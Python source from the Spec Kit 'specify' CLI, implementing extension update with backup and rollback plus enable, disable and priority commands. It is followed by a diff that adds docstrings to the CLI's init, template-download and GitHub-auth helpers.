      in a single top-level subdirectory (GitHub auto-generated ZIPs); an ID
      mismatch or missing manifest aborts that extension's update BEFORE the
      old installation is touched.
    - User config files (``*-config.yml`` / ``*-config.local.yml``) and the
      original ``installed_at``, ``priority``, and ``enabled`` state are
      restored after a successful install; a previously disabled extension
      stays disabled (including its hooks).
    - On any failure mid-update, the extension directory, command files
      (including Copilot prompt files), hooks config, and registry entry are
      rolled back from the backup; if rollback itself fails, the backup
      directory is preserved on disk and its path is printed.
    - KeyboardInterrupt is re-raised immediately (no rollback message spam).
    - Exits 1 if any extension failed to update; validation/extension errors
      are reported and exit 1.
    """
    from .extensions import (
        ExtensionManager,
        ExtensionCatalog,
        ExtensionError,
        ValidationError,
        CommandRegistrar,
        HookExecutor,
        normalize_priority,
    )
    from packaging import version as pkg_version
    import shutil
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    catalog = ExtensionCatalog(project_root)
    speckit_version = get_speckit_version()
    try:
        # Get list of extensions to update
        installed = manager.list_installed()
        if extension:
            # Update specific extension - resolve ID from argument (handles ambiguous names)
            extension_id, _ = _resolve_installed_extension(extension, installed, "update")
            extensions_to_update = [extension_id]
        else:
            # Update all extensions
            extensions_to_update = [ext["id"] for ext in installed]
            if not extensions_to_update:
                console.print("[yellow]No extensions installed[/yellow]")
                raise typer.Exit(0)
        console.print("🔄 Checking for updates...\n")
        updates_available = []
        for ext_id in extensions_to_update:
            # Get installed version; tolerate corrupted registry entries.
            metadata = manager.registry.get(ext_id)
            if metadata is None or not isinstance(metadata, dict) or "version" not in metadata:
                console.print(f"⚠ {ext_id}: Registry entry corrupted or missing (skipping)")
                continue
            try:
                installed_version = pkg_version.Version(metadata["version"])
            except pkg_version.InvalidVersion:
                console.print(
                    f"⚠ {ext_id}: Invalid installed version '{metadata.get('version')}' in registry (skipping)"
                )
                continue
            # Get catalog info
            ext_info = catalog.get_extension_info(ext_id)
            if not ext_info:
                console.print(f"⚠ {ext_id}: Not found in catalog (skipping)")
                continue
            # Check if installation is allowed from this catalog
            if not ext_info.get("_install_allowed", True):
                console.print(f"⚠ {ext_id}: Updates not allowed from '{ext_info.get('_catalog_name', 'catalog')}' (skipping)")
                continue
            try:
                catalog_version = pkg_version.Version(ext_info["version"])
            except pkg_version.InvalidVersion:
                console.print(
                    f"⚠ {ext_id}: Invalid catalog version '{ext_info.get('version')}' (skipping)"
                )
                continue
            if catalog_version > installed_version:
                updates_available.append(
                    {
                        "id": ext_id,
                        "name": ext_info.get("name", ext_id),  # Display name for status messages
                        "installed": str(installed_version),
                        "available": str(catalog_version),
                        "download_url": ext_info.get("download_url"),
                    }
                )
            else:
                console.print(f"✓ {ext_id}: Up to date (v{installed_version})")
        if not updates_available:
            console.print("\n[green]All extensions are up to date![/green]")
            raise typer.Exit(0)
        # Show available updates
        console.print("\n[bold]Updates available:[/bold]\n")
        for update in updates_available:
            console.print(
                f" • {update['id']}: {update['installed']} → {update['available']}"
            )
        console.print()
        confirm = typer.confirm("Update these extensions?")
        if not confirm:
            console.print("Cancelled")
            raise typer.Exit(0)
        # Perform updates with atomic backup/restore
        console.print()
        updated_extensions = []
        failed_updates = []
        registrar = CommandRegistrar()
        hook_executor = HookExecutor(project_root)
        for update in updates_available:
            extension_id = update["id"]
            ext_name = update["name"]  # Use display name for user-facing messages
            console.print(f"📦 Updating {ext_name}...")
            # Backup paths
            backup_base = manager.extensions_dir / ".backup" / f"{extension_id}-update"
            backup_ext_dir = backup_base / "extension"
            backup_commands_dir = backup_base / "commands"
            backup_config_dir = backup_base / "config"
            # Store backup state
            backup_registry_entry = None
            backup_hooks = None  # None means no hooks key in config; {} means hooks key existed
            backed_up_command_files = {}
            try:
                # 1. Backup registry entry (always, even if extension dir doesn't exist)
                backup_registry_entry = manager.registry.get(extension_id)
                # 2. Backup extension directory
                extension_dir = manager.extensions_dir / extension_id
                if extension_dir.exists():
                    backup_base.mkdir(parents=True, exist_ok=True)
                    if backup_ext_dir.exists():
                        shutil.rmtree(backup_ext_dir)
                    shutil.copytree(extension_dir, backup_ext_dir)
                    # Backup config files separately so they can be restored
                    # after a successful install (install_from_directory clears dest dir).
                    config_files = list(extension_dir.glob("*-config.yml")) + list(
                        extension_dir.glob("*-config.local.yml")
                    )
                    for cfg_file in config_files:
                        backup_config_dir.mkdir(parents=True, exist_ok=True)
                        shutil.copy2(cfg_file, backup_config_dir / cfg_file.name)
                # 3. Backup command files for all agents
                # NOTE(review): backup_registry_entry may still be None here if the
                # registry had no entry; the resulting AttributeError is caught by
                # the outer except and triggers a (harmless) rollback — confirm
                # whether a nicer skip is wanted.
                registered_commands = backup_registry_entry.get("registered_commands", {})
                for agent_name, cmd_names in registered_commands.items():
                    # Ignore agents the registrar doesn't know about.
                    if agent_name not in registrar.AGENT_CONFIGS:
                        continue
                    agent_config = registrar.AGENT_CONFIGS[agent_name]
                    commands_dir = project_root / agent_config["dir"]
                    for cmd_name in cmd_names:
                        cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
                        if cmd_file.exists():
                            backup_cmd_path = backup_commands_dir / agent_name / cmd_file.name
                            backup_cmd_path.parent.mkdir(parents=True, exist_ok=True)
                            shutil.copy2(cmd_file, backup_cmd_path)
                            backed_up_command_files[str(cmd_file)] = str(backup_cmd_path)
                        # Also backup copilot prompt files
                        if agent_name == "copilot":
                            prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
                            if prompt_file.exists():
                                backup_prompt_path = backup_commands_dir / "copilot-prompts" / prompt_file.name
                                backup_prompt_path.parent.mkdir(parents=True, exist_ok=True)
                                shutil.copy2(prompt_file, backup_prompt_path)
                                backed_up_command_files[str(prompt_file)] = str(backup_prompt_path)
                # 4. Backup hooks from extensions.yml
                # Use backup_hooks=None to indicate config had no "hooks" key (don't create on restore)
                # Use backup_hooks={} to indicate config had "hooks" key with no hooks for this extension
                config = hook_executor.get_project_config()
                if "hooks" in config:
                    backup_hooks = {}  # Config has hooks key - preserve this fact
                    for hook_name, hook_list in config["hooks"].items():
                        ext_hooks = [h for h in hook_list if h.get("extension") == extension_id]
                        if ext_hooks:
                            backup_hooks[hook_name] = ext_hooks
                # 5. Download new version
                zip_path = catalog.download_extension(extension_id)
                try:
                    # 6. Validate extension ID from ZIP BEFORE modifying installation
                    # Handle both root-level and nested extension.yml (GitHub auto-generated ZIPs)
                    with zipfile.ZipFile(zip_path, "r") as zf:
                        import yaml
                        manifest_data = None
                        namelist = zf.namelist()
                        # First try root-level extension.yml
                        if "extension.yml" in namelist:
                            with zf.open("extension.yml") as f:
                                manifest_data = yaml.safe_load(f) or {}
                        else:
                            # Look for extension.yml in a single top-level subdirectory
                            # (e.g., "repo-name-branch/extension.yml")
                            manifest_paths = [n for n in namelist if n.endswith("/extension.yml") and n.count("/") == 1]
                            if len(manifest_paths) == 1:
                                with zf.open(manifest_paths[0]) as f:
                                    manifest_data = yaml.safe_load(f) or {}
                        # No manifest (or ambiguous nesting) means the archive
                        # is unusable — fail before touching the installation.
                        if manifest_data is None:
                            raise ValueError("Downloaded extension archive is missing 'extension.yml'")
                        zip_extension_id = manifest_data.get("extension", {}).get("id")
                        if zip_extension_id != extension_id:
                            raise ValueError(
                                f"Extension ID mismatch: expected '{extension_id}', got '{zip_extension_id}'"
                            )
                    # 7. Remove old extension (handles command file cleanup and registry removal)
                    manager.remove(extension_id, keep_config=True)
                    # 8. Install new version
                    _ = manager.install_from_zip(zip_path, speckit_version)
                    # Restore user config files from backup after successful install.
                    new_extension_dir = manager.extensions_dir / extension_id
                    if backup_config_dir.exists() and new_extension_dir.exists():
                        for cfg_file in backup_config_dir.iterdir():
                            if cfg_file.is_file():
                                shutil.copy2(cfg_file, new_extension_dir / cfg_file.name)
                    # 9. Restore metadata from backup (installed_at, enabled state)
                    if backup_registry_entry and isinstance(backup_registry_entry, dict):
                        # Copy current registry entry to avoid mutating internal
                        # registry state before explicit restore().
                        current_metadata = manager.registry.get(extension_id)
                        if current_metadata is None or not isinstance(current_metadata, dict):
                            raise RuntimeError(
                                f"Registry entry for '{extension_id}' missing or corrupted after install — update incomplete"
                            )
                        new_metadata = dict(current_metadata)
                        # Preserve the original installation timestamp
                        if "installed_at" in backup_registry_entry:
                            new_metadata["installed_at"] = backup_registry_entry["installed_at"]
                        # Preserve the original priority (normalized to handle corruption)
                        if "priority" in backup_registry_entry:
                            new_metadata["priority"] = normalize_priority(backup_registry_entry["priority"])
                        # If extension was disabled before update, disable it again
                        if not backup_registry_entry.get("enabled", True):
                            new_metadata["enabled"] = False
                        # Use restore() instead of update() because update() always
                        # preserves the existing installed_at, ignoring our override
                        manager.registry.restore(extension_id, new_metadata)
                        # Also disable hooks in extensions.yml if extension was disabled
                        if not backup_registry_entry.get("enabled", True):
                            config = hook_executor.get_project_config()
                            if "hooks" in config:
                                for hook_name in config["hooks"]:
                                    for hook in config["hooks"][hook_name]:
                                        if hook.get("extension") == extension_id:
                                            hook["enabled"] = False
                                hook_executor.save_project_config(config)
                finally:
                    # Clean up downloaded ZIP
                    if zip_path.exists():
                        zip_path.unlink()
                # 10. Clean up backup on success
                if backup_base.exists():
                    shutil.rmtree(backup_base)
                console.print(f" [green]✓[/green] Updated to v{update['available']}")
                updated_extensions.append(ext_name)
            except KeyboardInterrupt:
                # Never swallow Ctrl-C into the rollback path.
                raise
            except Exception as e:
                console.print(f" [red]✗[/red] Failed: {e}")
                failed_updates.append((ext_name, str(e)))
                # Rollback on failure
                console.print(f" [yellow]↩[/yellow] Rolling back {ext_name}...")
                try:
                    # Restore extension directory
                    # Only perform destructive rollback if backup exists (meaning we
                    # actually modified the extension). This avoids deleting a valid
                    # installation when failure happened before changes were made.
                    extension_dir = manager.extensions_dir / extension_id
                    if backup_ext_dir.exists():
                        if extension_dir.exists():
                            shutil.rmtree(extension_dir)
                        shutil.copytree(backup_ext_dir, extension_dir)
                    # Remove any NEW command files created by failed install
                    # (files that weren't in the original backup)
                    try:
                        new_registry_entry = manager.registry.get(extension_id)
                        if new_registry_entry is None or not isinstance(new_registry_entry, dict):
                            new_registered_commands = {}
                        else:
                            new_registered_commands = new_registry_entry.get("registered_commands", {})
                        for agent_name, cmd_names in new_registered_commands.items():
                            if agent_name not in registrar.AGENT_CONFIGS:
                                continue
                            agent_config = registrar.AGENT_CONFIGS[agent_name]
                            commands_dir = project_root / agent_config["dir"]
                            for cmd_name in cmd_names:
                                cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
                                # Delete if it exists and wasn't in our backup
                                if cmd_file.exists() and str(cmd_file) not in backed_up_command_files:
                                    cmd_file.unlink()
                                # Also handle copilot prompt files
                                if agent_name == "copilot":
                                    prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
                                    if prompt_file.exists() and str(prompt_file) not in backed_up_command_files:
                                        prompt_file.unlink()
                    except KeyError:
                        pass  # No new registry entry exists, nothing to clean up
                    # Restore backed up command files
                    for original_path, backup_path in backed_up_command_files.items():
                        backup_file = Path(backup_path)
                        if backup_file.exists():
                            original_file = Path(original_path)
                            original_file.parent.mkdir(parents=True, exist_ok=True)
                            shutil.copy2(backup_file, original_file)
                    # Restore hooks in extensions.yml
                    # - backup_hooks=None means original config had no "hooks" key
                    # - backup_hooks={} or {...} means config had hooks key
                    config = hook_executor.get_project_config()
                    if "hooks" in config:
                        modified = False
                        if backup_hooks is None:
                            # Original config had no "hooks" key; remove it entirely
                            del config["hooks"]
                            modified = True
                        else:
                            # Remove any hooks for this extension added by failed install
                            for hook_name, hooks_list in config["hooks"].items():
                                original_len = len(hooks_list)
                                config["hooks"][hook_name] = [
                                    h for h in hooks_list
                                    if h.get("extension") != extension_id
                                ]
                                if len(config["hooks"][hook_name]) != original_len:
                                    modified = True
                            # Add back the backed up hooks if any
                            if backup_hooks:
                                for hook_name, hooks in backup_hooks.items():
                                    if hook_name not in config["hooks"]:
                                        config["hooks"][hook_name] = []
                                    config["hooks"][hook_name].extend(hooks)
                                modified = True
                        if modified:
                            hook_executor.save_project_config(config)
                    # Restore registry entry (use restore() since entry was removed)
                    if backup_registry_entry:
                        manager.registry.restore(extension_id, backup_registry_entry)
                    console.print(" [green]✓[/green] Rollback successful")
                    # Clean up backup directory only on successful rollback
                    if backup_base.exists():
                        shutil.rmtree(backup_base)
                except Exception as rollback_error:
                    # Rollback itself failed: keep the backup on disk so the
                    # user can recover manually, and say where it is.
                    console.print(f" [red]✗[/red] Rollback failed: {rollback_error}")
                    console.print(f" [dim]Backup preserved at: {backup_base}[/dim]")
        # Summary
        console.print()
        if updated_extensions:
            console.print(f"[green]✓[/green] Successfully updated {len(updated_extensions)} extension(s)")
        if failed_updates:
            console.print(f"[red]✗[/red] Failed to update {len(failed_updates)} extension(s):")
            for ext_name, error in failed_updates:
                console.print(f" • {ext_name}: {error}")
            raise typer.Exit(1)
    except ValidationError as e:
        console.print(f"\n[red]Validation Error:[/red] {e}")
        raise typer.Exit(1)
    except ExtensionError as e:
        console.print(f"\n[red]Error:[/red] {e}")
        raise typer.Exit(1)
@extension_app.command("enable")
def extension_enable(
    extension: str = typer.Argument(help="Extension ID or name to enable"),
):
    """Enable a previously disabled extension.

    Edge cases handled:
    - Not run from a spec-kit project root (no .specify/): exits 1.
    - Ambiguous name vs ID is resolved via _resolve_installed_extension,
      which presumably errors out on its own for unknown/ambiguous input —
      confirm against its definition.
    - Registry entry missing or not a dict (corrupted state): exits 1
      without modifying anything.
    - Already enabled (or "enabled" key absent, which defaults to True):
      no-op, exits 0.
    - Hooks in extensions.yml are re-enabled only when the config actually
      has a "hooks" key; the config is saved only in that branch.
    """
    from .extensions import ExtensionManager, HookExecutor
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    hook_executor = HookExecutor(project_root)
    # Resolve extension ID from argument (handles ambiguous names)
    installed = manager.list_installed()
    extension_id, display_name = _resolve_installed_extension(extension, installed, "enable")
    # Update registry
    metadata = manager.registry.get(extension_id)
    if metadata is None or not isinstance(metadata, dict):
        console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
        raise typer.Exit(1)
    # Missing "enabled" key is treated as enabled, so this is also the
    # fresh-install no-op path.
    if metadata.get("enabled", True):
        console.print(f"[yellow]Extension '{display_name}' is already enabled[/yellow]")
        raise typer.Exit(0)
    metadata["enabled"] = True
    manager.registry.update(extension_id, metadata)
    # Enable hooks in extensions.yml
    config = hook_executor.get_project_config()
    if "hooks" in config:
        for hook_name in config["hooks"]:
            for hook in config["hooks"][hook_name]:
                if hook.get("extension") == extension_id:
                    hook["enabled"] = True
        hook_executor.save_project_config(config)
    console.print(f"[green]✓[/green] Extension '{display_name}' enabled")
@extension_app.command("disable")
def extension_disable(
    extension: str = typer.Argument(help="Extension ID or name to disable"),
):
    """Disable an installed extension without removing it.

    Edge cases handled (mirror of `extension enable`):
    - Not run from a spec-kit project root (no .specify/): exits 1.
    - Ambiguous name vs ID is resolved via _resolve_installed_extension.
    - Registry entry missing or not a dict (corrupted state): exits 1
      without modifying anything.
    - Already disabled: no-op, exits 0. Note that a missing "enabled" key
      defaults to True, so an extension that was never toggled IS disabled
      by this command.
    - Hooks in extensions.yml are disabled only when the config has a
      "hooks" key; the config is saved only in that branch.
    """
    from .extensions import ExtensionManager, HookExecutor
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    hook_executor = HookExecutor(project_root)
    # Resolve extension ID from argument (handles ambiguous names)
    installed = manager.list_installed()
    extension_id, display_name = _resolve_installed_extension(extension, installed, "disable")
    # Update registry
    metadata = manager.registry.get(extension_id)
    if metadata is None or not isinstance(metadata, dict):
        console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
        raise typer.Exit(1)
    if not metadata.get("enabled", True):
        console.print(f"[yellow]Extension '{display_name}' is already disabled[/yellow]")
        raise typer.Exit(0)
    metadata["enabled"] = False
    manager.registry.update(extension_id, metadata)
    # Disable hooks in extensions.yml
    config = hook_executor.get_project_config()
    if "hooks" in config:
        for hook_name in config["hooks"]:
            for hook in config["hooks"][hook_name]:
                if hook.get("extension") == extension_id:
                    hook["enabled"] = False
        hook_executor.save_project_config(config)
    console.print(f"[green]✓[/green] Extension '{display_name}' disabled")
    console.print("\nCommands will no longer be available. Hooks will not execute.")
    console.print(f"To re-enable: specify extension enable {extension_id}")
@extension_app.command("set-priority")
def extension_set_priority(
    extension: str = typer.Argument(help="Extension ID or name"),
    priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
    """Set the template-resolution priority of an installed extension.

    Edge cases handled:
    - Not run from a spec-kit project root (no .specify/): exits 1.
    - priority < 1 is rejected before touching the registry: exits 1.
    - Registry entry missing or not a dict (corrupted state): exits 1.
    - Early-exit "already set" check compares only when the STORED value is a
      valid int: a corrupted stored priority (e.g. the string "high") is
      never short-circuited, so it gets repaired even when the requested
      value equals the normalized default.
    - The old priority shown to the user is normalize_priority()'d so
      corrupted values display as their effective default rather than junk.
    """
    from .extensions import ExtensionManager
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    # Validate priority
    if priority < 1:
        console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    # Resolve extension ID from argument (handles ambiguous names)
    installed = manager.list_installed()
    extension_id, display_name = _resolve_installed_extension(extension, installed, "set-priority")
    # Get current metadata
    metadata = manager.registry.get(extension_id)
    if metadata is None or not isinstance(metadata, dict):
        console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
        raise typer.Exit(1)
    from .extensions import normalize_priority
    raw_priority = metadata.get("priority")
    # Only skip if the stored value is already a valid int equal to requested priority
    # This ensures corrupted values (e.g. "high") get repaired even when setting to default (10)
    if isinstance(raw_priority, int) and raw_priority == priority:
        console.print(f"[yellow]Extension '{display_name}' already has priority {priority}[/yellow]")
        raise typer.Exit(0)
    old_priority = normalize_priority(raw_priority)
    # Update priority
    manager.registry.update(extension_id, {"priority": priority})
    console.print(f"[green]✓[/green] Extension '{display_name}' priority changed: {old_priority} → {priority}")
    console.print("\n[dim]Lower priority = higher precedence in template resolution[/dim]")
def main() -> None:
    """CLI entry point: delegate to the Typer application."""
    app()
if __name__ == "__main__":
main() | --- +++ @@ -10,6 +10,20 @@ # "json5",
# ]
# ///
+"""
+Specify CLI - Setup tool for Specify projects
+
+Usage:
+ uvx specify-cli.py init <project-name>
+ uvx specify-cli.py init .
+ uvx specify-cli.py init --here
+
+Or install globally:
+ uv tool install --from specify-cli.py specify-cli
+ specify init <project-name>
+ specify init .
+ specify init --here
+"""
import os
import subprocess
@@ -47,13 +61,16 @@ client = httpx.Client(verify=ssl_context)
def _github_token(cli_token: str | None = None) -> str | None:
+ """Return sanitized GitHub token (cli arg takes precedence) or None."""
return ((cli_token or os.getenv("GH_TOKEN") or os.getenv("GITHUB_TOKEN") or "").strip()) or None
def _github_auth_headers(cli_token: str | None = None) -> dict:
+ """Return Authorization header dict only when a non-empty token exists."""
token = _github_token(cli_token)
return {"Authorization": f"Bearer {token}"} if token else {}
def _parse_rate_limit_headers(headers: httpx.Headers) -> dict:
+ """Extract and parse GitHub rate-limit headers."""
info = {}
# Standard GitHub rate-limit headers
@@ -81,6 +98,7 @@ return info
def _format_rate_limit_error(status_code: int, headers: httpx.Headers, url: str) -> str:
+ """Format a user-friendly error message with rate-limit information."""
rate_info = _parse_rate_limit_headers(headers)
lines = [f"GitHub API returned status {status_code} for {url}"]
@@ -285,6 +303,7 @@ }
def _build_ai_assistant_help() -> str:
+ """Build the --ai help text from AGENT_CONFIG so it stays in sync with runtime config."""
non_generic_agents = sorted(agent for agent in AGENT_CONFIG if agent != "generic")
base_help = (
@@ -322,6 +341,9 @@
TAGLINE = "GitHub Spec Kit - Spec-Driven Development Toolkit"
class StepTracker:
+ """Track and render hierarchical steps without emojis, similar to Claude Code tree output.
+ Supports live auto-refresh via an attached refresh callback.
+ """
def __init__(self, title: str):
self.title = title
self.steps = [] # list of dicts: {key, label, status, detail}
@@ -404,6 +426,7 @@ return tree
def get_key():
+ """Get a single keypress in a cross-platform way using readchar."""
key = readchar.readkey()
if key == readchar.key.UP or key == readchar.key.CTRL_P:
@@ -423,6 +446,17 @@ return key
def select_with_arrows(options: dict, prompt_text: str = "Select an option", default_key: str = None) -> str:
+ """
+ Interactive selection using arrow keys with Rich Live display.
+
+ Args:
+ options: Dict with keys as option keys and values as descriptions
+ prompt_text: Text to show above the options
+ default_key: Default option key to start with
+
+ Returns:
+ Selected option key
+ """
option_keys = list(options.keys())
if default_key and default_key in option_keys:
selected_index = option_keys.index(default_key)
@@ -432,6 +466,7 @@ selected_key = None
def create_selection_panel():
+ """Create the selection panel with current selection highlighted."""
table = Table.grid(padding=(0, 2))
table.add_column(style="cyan", justify="left", width=3)
table.add_column(style="white", justify="left")
@@ -488,6 +523,7 @@ console = Console()
class BannerGroup(TyperGroup):
+ """Custom group that shows banner before help."""
def format_help(self, ctx, formatter):
# Show banner before help
@@ -504,6 +540,7 @@ )
def show_banner():
+ """Display the ASCII art banner."""
banner_lines = BANNER.strip().split('\n')
colors = ["bright_blue", "blue", "cyan", "bright_cyan", "white", "bright_white"]
@@ -518,12 +555,14 @@
@app.callback()
def callback(ctx: typer.Context):
+ """Show banner when no subcommand is provided."""
if ctx.invoked_subcommand is None and "--help" not in sys.argv and "-h" not in sys.argv:
show_banner()
console.print(Align.center("[dim]Run 'specify --help' for usage information[/dim]"))
console.print()
def run_command(cmd: list[str], check_return: bool = True, capture: bool = False, shell: bool = False) -> Optional[str]:
+ """Run a shell command and optionally capture output."""
try:
if capture:
result = subprocess.run(cmd, check=check_return, capture_output=True, text=True, shell=shell)
@@ -541,6 +580,15 @@ return None
def check_tool(tool: str, tracker: StepTracker = None) -> bool:
+ """Check if a tool is installed. Optionally update tracker.
+
+ Args:
+ tool: Name of the tool to check
+ tracker: Optional StepTracker to update with results
+
+ Returns:
+ True if tool is found, False otherwise
+ """
# Special handling for Claude CLI after `claude migrate-installer`
# See: https://github.com/github/spec-kit/issues/123
# The migrate-installer command REMOVES the original executable from PATH
@@ -568,6 +616,7 @@ return found
def is_git_repo(path: Path = None) -> bool:
+ """Check if the specified path is inside a git repository."""
if path is None:
path = Path.cwd()
@@ -587,6 +636,15 @@ return False
def init_git_repo(project_path: Path, quiet: bool = False) -> Tuple[bool, Optional[str]]:
+ """Initialize a git repository in the specified path.
+
+ Args:
+ project_path: Path to initialize git repository in
+ quiet: if True suppress console output (tracker handles status)
+
+ Returns:
+ Tuple of (success: bool, error_message: Optional[str])
+ """
try:
original_cwd = Path.cwd()
os.chdir(project_path)
@@ -613,11 +671,17 @@ os.chdir(original_cwd)
def handle_vscode_settings(sub_item, dest_file, rel_path, verbose=False, tracker=None) -> None:
+ """Handle merging or copying of .vscode/settings.json files.
+
+ Note: when merge produces changes, rewritten output is normalized JSON and
+ existing JSONC comments/trailing commas are not preserved.
+ """
def log(message, color="green"):
if verbose and not tracker:
console.print(f"[{color}]{message}[/] {rel_path}")
def atomic_write_json(target_file: Path, payload: dict[str, Any]) -> None:
+ """Atomically write JSON while preserving existing mode bits when possible."""
temp_path: Optional[Path] = None
try:
with tempfile.NamedTemporaryFile(
@@ -676,6 +740,22 @@
def merge_json_files(existing_path: Path, new_content: Any, verbose: bool = False) -> Optional[dict[str, Any]]:
+ """Merge new JSON content into existing JSON file.
+
+ Performs a polite deep merge where:
+ - New keys are added
+ - Existing keys are preserved (not overwritten) unless both values are dictionaries
+ - Nested dictionaries are merged recursively only when both sides are dictionaries
+ - Lists and other values are preserved from base if they exist
+
+ Args:
+ existing_path: Path to existing JSON file
+ new_content: New JSON content to merge in
+ verbose: Whether to print merge details
+
+ Returns:
+ Merged JSON content as dict, or None if the existing file should be left untouched.
+ """
# Load existing content first to have a safe fallback
existing_content = None
exists = existing_path.exists()
@@ -711,6 +791,7 @@ return None
def deep_merge_polite(base: dict[str, Any], update: dict[str, Any]) -> dict[str, Any]:
+ """Recursively merge update dict into base dict, preserving base values."""
result = base.copy()
for key, value in update.items():
if key not in result:
@@ -852,6 +933,9 @@ return zip_path, metadata
def download_and_extract_template(project_path: Path, ai_assistant: str, script_type: str, is_current_dir: bool = False, *, verbose: bool = True, tracker: StepTracker | None = None, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Path:
+ """Download the latest release and extract it to create a new project.
+ Returns project_path. Uses tracker if provided (with keys: fetch, download, extract, cleanup)
+ """
current_dir = Path.cwd()
if tracker:
@@ -999,6 +1083,7 @@
def ensure_executable_scripts(project_path: Path, tracker: StepTracker | None = None) -> None:
+ """Ensure POSIX .sh scripts under .specify/scripts (recursively) have execute bits (no-op on Windows)."""
if os.name == "nt":
return # Windows: skip silently
scripts_root = project_path / ".specify" / "scripts"
@@ -1046,6 +1131,7 @@ console.print(f" - {f}")
def ensure_constitution_from_template(project_path: Path, tracker: StepTracker | None = None) -> None:
+ """Copy constitution template to memory if it doesn't exist (preserves existing constitution on reinitialization)."""
memory_constitution = project_path / ".specify" / "memory" / "constitution.md"
template_constitution = project_path / ".specify" / "templates" / "constitution-template.md"
@@ -1084,12 +1170,22 @@
def save_init_options(project_path: Path, options: dict[str, Any]) -> None:
+ """Persist the CLI options used during ``specify init``.
+
+ Writes a small JSON file to ``.specify/init-options.json`` so that
+ later operations (e.g. preset install) can adapt their behaviour
+ without scanning the filesystem.
+ """
dest = project_path / INIT_OPTIONS_FILE
dest.parent.mkdir(parents=True, exist_ok=True)
dest.write_text(json.dumps(options, indent=2, sort_keys=True))
def load_init_options(project_path: Path) -> dict[str, Any]:
+ """Load the init options previously saved by ``specify init``.
+
+ Returns an empty dict if the file does not exist or cannot be parsed.
+ """
path = project_path / INIT_OPTIONS_FILE
if not path.exists():
return {}
@@ -1123,6 +1219,12 @@
def _get_skills_dir(project_path: Path, selected_ai: str) -> Path:
+ """Resolve the agent-specific skills directory for the given AI assistant.
+
+ Uses ``AGENT_SKILLS_DIR_OVERRIDES`` first, then falls back to
+ ``AGENT_CONFIG[agent]["folder"] + "skills"``, and finally to
+ ``DEFAULT_SKILLS_DIR``.
+ """
if selected_ai in AGENT_SKILLS_DIR_OVERRIDES:
return project_path / AGENT_SKILLS_DIR_OVERRIDES[selected_ai]
@@ -1135,6 +1237,22 @@
def install_ai_skills(project_path: Path, selected_ai: str, tracker: StepTracker | None = None) -> bool:
+ """Install Prompt.MD files from templates/commands/ as agent skills.
+
+ Skills are written to the agent-specific skills directory following the
+ `agentskills.io <https://agentskills.io/specification>`_ specification.
+ Installation is additive — existing files are never removed and prompt
+ command files in the agent's commands directory are left untouched.
+
+ Args:
+ project_path: Target project directory.
+ selected_ai: AI assistant key from ``AGENT_CONFIG``.
+ tracker: Optional progress tracker.
+
+ Returns:
+ ``True`` if at least one skill was installed or all skills were
+ already present (idempotent re-run), ``False`` otherwise.
+ """
# Locate command templates in the agent's extracted commands directory.
# download_and_extract_template() already placed the .md files here.
agent_config = AGENT_CONFIG.get(selected_ai, {})
@@ -1292,6 +1410,16 @@
def _handle_agy_deprecation(console: Console) -> None:
+ """
+ Print the deprecation error for the Antigravity (agy) agent and exit.
+
+ Context for future AI reviewers (e.g., GitHub Copilot):
+ - Prior to Antigravity v1.20.5, users could rely on explicit agent command definitions generated by this tool.
+ - v1.20.5 removed this "command support" in favor of "Agent Skills".
+ - `specify_cli` handles this by throwing a fail-fast deprecation error if `--ai agy` is
+ invoked without the accompanying `--ai-skills` flag. Users are instructed to add
+ the skills flag to generate agent skills templates instead.
+ """
console.print("\n[red]Error:[/red] Explicit command support was deprecated in Antigravity version 1.20.5.")
console.print("Please use [cyan]--ai-skills[/cyan] when initializing to install templates as agent skills instead.")
console.print("[yellow]Usage:[/yellow] specify init <project> --ai agy --ai-skills")
@@ -1313,6 +1441,35 @@ ai_skills: bool = typer.Option(False, "--ai-skills", help="Install Prompt.MD templates as agent skills (requires --ai)"),
preset: str = typer.Option(None, "--preset", help="Install a preset during initialization (by preset ID)"),
):
+ """
+ Initialize a new Specify project from the latest template.
+
+ This command will:
+ 1. Check that required tools are installed (git is optional)
+ 2. Let you choose your AI assistant
+ 3. Download the appropriate template from GitHub
+ 4. Extract the template to a new project directory or current directory
+ 5. Initialize a fresh git repository (if not --no-git and no existing repo)
+ 6. Optionally set up AI assistant commands
+
+ Examples:
+ specify init my-project
+ specify init my-project --ai claude
+ specify init my-project --ai copilot --no-git
+ specify init --ignore-agent-tools my-project
+ specify init . --ai claude # Initialize in current directory
+ specify init . # Initialize in current directory (interactive AI selection)
+ specify init --here --ai claude # Alternative syntax for current directory
+ specify init --here --ai codex
+ specify init --here --ai codebuddy
+ specify init --here --ai vibe # Initialize with Mistral Vibe support
+ specify init --here
+ specify init --here --force # Skip confirmation when current directory not empty
+ specify init my-project --ai claude --ai-skills # Install agent skills
